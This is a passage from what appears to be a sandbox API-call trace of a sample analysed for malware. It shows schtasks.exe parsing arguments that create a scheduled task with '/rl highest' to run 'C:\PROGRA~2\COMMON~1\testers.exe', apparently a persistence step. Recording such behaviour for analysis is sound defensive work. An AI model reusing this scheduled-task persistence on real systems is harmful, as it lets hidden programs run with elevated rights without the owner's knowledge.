(dwErrCode=0x0) [0074.034] lstrlenW (lpString="/rl") returned 3 [0074.034] StrChrIW (lpStart="/rl", wMatch=0x3a) returned 0x0 [0074.034] SetLastError (dwErrCode=0x490) [0074.034] SetLastError (dwErrCode=0x0) [0074.034] lstrlenW (lpString="/rl") returned 3 [0074.034] GetProcessHeap () returned 0x2c0000 [0074.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x8) returned 0x2d69f8 [0074.034] GetProcessHeap () returned 0x2c0000 [0074.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5478 [0074.034] SetLastError (dwErrCode=0x0) [0074.034] SetLastError (dwErrCode=0x0) [0074.035] lstrlenW (lpString="highest") returned 7 [0074.035] lstrlenW (lpString="-/") returned 2 [0074.035] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0074.035] SetLastError (dwErrCode=0x490) [0074.035] SetLastError (dwErrCode=0x490) [0074.035] SetLastError (dwErrCode=0x0) [0074.035] lstrlenW (lpString="highest") returned 7 [0074.035] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0074.035] SetLastError (dwErrCode=0x490) [0074.035] SetLastError (dwErrCode=0x0) [0074.035] lstrlenW (lpString="highest") returned 7 [0074.035] GetProcessHeap () returned 0x2c0000 [0074.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4d98 [0074.035] GetProcessHeap () returned 0x2c0000 [0074.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5498 [0074.035] SetLastError (dwErrCode=0x0) [0074.035] SetLastError (dwErrCode=0x0) [0074.035] lstrlenW (lpString="/tr") returned 3 [0074.035] lstrlenW (lpString="-/") returned 2 [0074.035] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0074.035] lstrlenW (lpString="?") returned 1 [0074.035] lstrlenW (lpString="?") returned 1 [0074.035] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.035] lstrlenW (lpString="tr") returned 2 [0074.035] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.035] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|?|") returned 3 [0074.035] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.035] lstrlenW (lpString="|?|") returned 3 [0074.035] lstrlenW (lpString="|tr|") returned 4 [0074.035] SetLastError (dwErrCode=0x490) [0074.035] lstrlenW (lpString="create") returned 6 [0074.035] lstrlenW (lpString="create") returned 6 [0074.035] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.035] lstrlenW (lpString="tr") returned 2 [0074.035] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.035] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|create|") returned 8 [0074.036] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.036] lstrlenW (lpString="|create|") returned 8 [0074.036] lstrlenW (lpString="|tr|") returned 4 [0074.036] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0074.036] SetLastError (dwErrCode=0x490) [0074.036] lstrlenW (lpString="delete") returned 6 [0074.036] lstrlenW (lpString="delete") returned 6 [0074.036] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] lstrlenW (lpString="tr") returned 2 [0074.036] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|delete|") returned 8 [0074.036] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.036] lstrlenW (lpString="|delete|") returned 8 [0074.036] lstrlenW (lpString="|tr|") returned 4 [0074.036] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0074.036] SetLastError (dwErrCode=0x490) [0074.036] lstrlenW (lpString="query") returned 5 [0074.036] lstrlenW (lpString="query") returned 5 [0074.036] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] lstrlenW (lpString="tr") returned 2 [0074.036] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x8, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|query|") returned 7 [0074.036] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.036] lstrlenW (lpString="|query|") returned 7 [0074.036] lstrlenW (lpString="|tr|") returned 4 [0074.036] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0074.036] SetLastError (dwErrCode=0x490) [0074.036] lstrlenW (lpString="change") returned 6 [0074.036] lstrlenW (lpString="change") returned 6 [0074.036] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] lstrlenW (lpString="tr") returned 2 [0074.036] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.036] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|change|") returned 8 [0074.037] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.037] lstrlenW (lpString="|change|") returned 8 [0074.037] lstrlenW (lpString="|tr|") returned 4 [0074.037] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0074.037] SetLastError (dwErrCode=0x490) [0074.037] lstrlenW (lpString="run") returned 3 [0074.037] lstrlenW (lpString="run") returned 3 [0074.037] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.037] lstrlenW (lpString="tr") returned 2 [0074.037] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.037] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|run|") returned 5 [0074.037] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.037] lstrlenW (lpString="|run|") returned 5 [0074.037] lstrlenW (lpString="|tr|") returned 4 [0074.037] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0074.037] SetLastError (dwErrCode=0x490) [0074.037] lstrlenW (lpString="end") returned 3 [0074.037] lstrlenW (lpString="end") returned 3 [0074.037] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.037] lstrlenW (lpString="tr") returned 2 [0074.037] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.037] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|end|") returned 5 [0074.037] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.037] lstrlenW (lpString="|end|") returned 5 [0074.037] lstrlenW (lpString="|tr|") returned 4 [0074.037] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0074.037] SetLastError (dwErrCode=0x490) [0074.037] lstrlenW (lpString="showsid") returned 7 [0074.037] lstrlenW (lpString="showsid") returned 7 [0074.037] _memicmp (_Buf1=0x2d4d50, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.037] lstrlenW (lpString="tr") returned 2 [0074.038] _memicmp (_Buf1=0x2d4d80, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.038] _vsnwprintf (in: _Buffer=0x2d53d8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|showsid|") returned 9 [0074.038] _vsnwprintf (in: _Buffer=0x2d5398, _BufferCount=0x5, _Format="|%s|", _ArgList=0xbf4a0 | out: _Buffer="|tr|") returned 4 [0074.038] lstrlenW (lpString="|showsid|") returned 9 [0074.038] lstrlenW (lpString="|tr|") returned 4 [0074.038] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0074.038] SetLastError (dwErrCode=0x490) [0074.038] SetLastError (dwErrCode=0x490) [0074.038] SetLastError (dwErrCode=0x0) [0074.038] lstrlenW (lpString="/tr") returned 3 [0074.038] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0074.038] SetLastError (dwErrCode=0x490) [0074.038] SetLastError (dwErrCode=0x0) [0074.038] lstrlenW (lpString="/tr") returned 3 [0074.038] GetProcessHeap () returned 0x2c0000 [0074.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x8) returned 0x2d6a08 [0074.038] GetProcessHeap () returned 0x2c0000 [0074.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d54b8 [0074.038] SetLastError (dwErrCode=0x0) [0074.038] SetLastError (dwErrCode=0x0) [0074.038] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.038] lstrlenW (lpString="-/") returned 2 [0074.038] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0074.038] SetLastError (dwErrCode=0x490) [0074.038] SetLastError (dwErrCode=0x490) [0074.038] SetLastError (dwErrCode=0x0) [0074.038] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.038] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\testers.exe" [0074.038] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.038] GetProcessHeap () returned 0x2c0000 [0074.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4db0 [0074.038] _memicmp (_Buf1=0x2d4db0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.038] GetProcessHeap () returned 0x2c0000 [0074.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0xc) returned 0x2d4dc8 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4de0 [0074.039] _memicmp (_Buf1=0x2d4de0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x46) returned 0x2d6a18 [0074.039] SetLastError (dwErrCode=0x7a) [0074.039] SetLastError (dwErrCode=0x0) [0074.039] SetLastError (dwErrCode=0x0) [0074.039] lstrlenW (lpString="C") returned 1 [0074.039] SetLastError (dwErrCode=0x490) [0074.039] SetLastError (dwErrCode=0x0) [0074.039] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x42) returned 0x2d6a68 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d54d8 [0074.039] SetLastError (dwErrCode=0x0) [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69d8) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d69d8) returned 0x8 [0074.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69d8 | out: hHeap=0x2c0000) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53b8) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d53b8) returned 0x14 [0074.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53b8 | out: hHeap=0x2c0000) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d68) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d68) returned 0x10 [0074.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d68 | out: hHeap=0x2c0000) returned 1 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.039] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53f8) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d53f8) returned 0x14 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53f8 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69e8) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d69e8) returned 0x8 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69e8 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5418) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5418) returned 0x14 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5418 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5438) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5438) returned 0x16 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5438 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5458) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5458) returned 0x14 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5458 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69f8) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d69f8) returned 0x8 [0074.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69f8 | out: hHeap=0x2c0000) returned 1 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.040] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5478) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5478) returned 0x14 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5478 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d98) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d98) returned 0x10 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d98 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5498) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5498) returned 0x14 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5498 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a08) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6a08) returned 0x8 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a08 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54b8) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d54b8) returned 0x14 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54b8 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a68) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6a68) returned 0x42 [0074.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a68 | out: hHeap=0x2c0000) returned 1 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.041] GetProcessHeap () returned 0x2c0000 [0074.042] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54d8) returned 1 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d54d8) returned 0x14 [0074.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54d8 | out: hHeap=0x2c0000) returned 1 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c48) returned 1 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4c48) returned 0x10 [0074.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c48 | out: hHeap=0x2c0000) returned 1 [0074.042] SetLastError (dwErrCode=0x0) [0074.042] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0074.042] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0074.042] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0074.042] VerifyVersionInfoW (in: lpVersionInformation=0xbc8b8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xbc8b8) returned 1 [0074.042] SetLastError (dwErrCode=0x0) [0074.042] lstrlenW (lpString="create") returned 6 [0074.042] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0074.042] SetLastError (dwErrCode=0x490) [0074.042] SetLastError (dwErrCode=0x0) [0074.042] lstrlenW (lpString="create") returned 6 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d54d8 [0074.042] GetProcessHeap () returned 0x2c0000 [0074.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x10) returned 0x2d4c48 [0074.043] _memicmp (_Buf1=0x2d4c48, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.043] GetProcessHeap () returned 0x2c0000 [0074.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x16) returned 0x2d54b8 [0074.043] SetLastError (dwErrCode=0x0) [0074.043] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.043] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d5b00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0074.043] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0074.043] GetProcessHeap () returned 0x2c0000 [0074.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x74e) returned 0x2d5d10 [0074.043] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2d5d10 | out: lpData=0x2d5d10) returned 1 [0074.043] VerQueryValueW (in: pBlock=0x2d5d10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xbc9c0, puLen=0xbc9c4 | out: lplpBuffer=0xbc9c0*=0x2d60ac, puLen=0xbc9c4) returned 1 [0074.043] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.043] _vsnwprintf (in: _Buffer=0x2d5b00, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xbc9a8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0074.043] VerQueryValueW (in: pBlock=0x2d5d10, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xbc9d0, puLen=0xbc9cc | out: lplpBuffer=0xbc9d0*=0x2d5ed8, puLen=0xbc9cc) returned 1 [0074.043] lstrlenW (lpString="schtasks.exe") returned 12 [0074.043] lstrlenW (lpString="schtasks.exe") returned 12 [0074.043] lstrlenW (lpString=".EXE") returned 4 [0074.044] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0074.044] lstrlenW (lpString="schtasks.exe") returned 12 [0074.044] lstrlenW (lpString=".EXE") returned 4 [0074.044] lstrlenW (lpString="schtasks") returned 8 [0074.044] lstrlenW (lpString="/create") returned 7 [0074.044] _memicmp (_Buf1=0x2d4cc0, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.044] _vsnwprintf (in: _Buffer=0x2d5b00, _BufferCount=0x19, _Format="%s %s", _ArgList=0xbc9a8 | out: _Buffer="schtasks /create") returned 16 [0074.044] _memicmp (_Buf1=0x2d4d20, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.044] GetProcessHeap () returned 0x2c0000 [0074.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x14) returned 0x2d5498 [0074.044] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.044] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0074.044] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0074.044] GetProcessHeap () returned 0x2c0000 [0074.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0xc, Size=0x30) returned 0x2d69d8 [0074.044] _vsnwprintf (in: _Buffer=0x2d66f0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xbc9ac | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0074.044] GetProcessHeap () returned 0x2c0000 [0074.044] GetProcessHeap () returned 0x2c0000 [0074.044] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5d10) returned 1 [0074.044] GetProcessHeap () returned 0x2c0000 [0074.044] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5d10) returned 0x74e [0074.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5d10 | out: hHeap=0x2c0000) returned 1 [0074.044] SetLastError (dwErrCode=0x0) [0074.044] GetThreadLocale () returned 0x409 [0074.044] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.044] lstrlenW (lpString="create") returned 6 [0074.044] GetThreadLocale () returned 0x409 [0074.044] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.044] lstrlenW (lpString="?") returned 1 [0074.044] GetThreadLocale () returned 0x409 [0074.044] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.044] lstrlenW (lpString="s") returned 1 [0074.044] GetThreadLocale () returned 0x409 [0074.044] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="u") returned 1 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="p") returned 1 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="ru") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="rp") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="sc") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="mo") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="d") returned 1 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="m") returned 1 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="i") returned 1 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0074.045] lstrlenW (lpString="tn") returned 2 [0074.045] GetThreadLocale () returned 0x409 [0074.045] CompareStringA 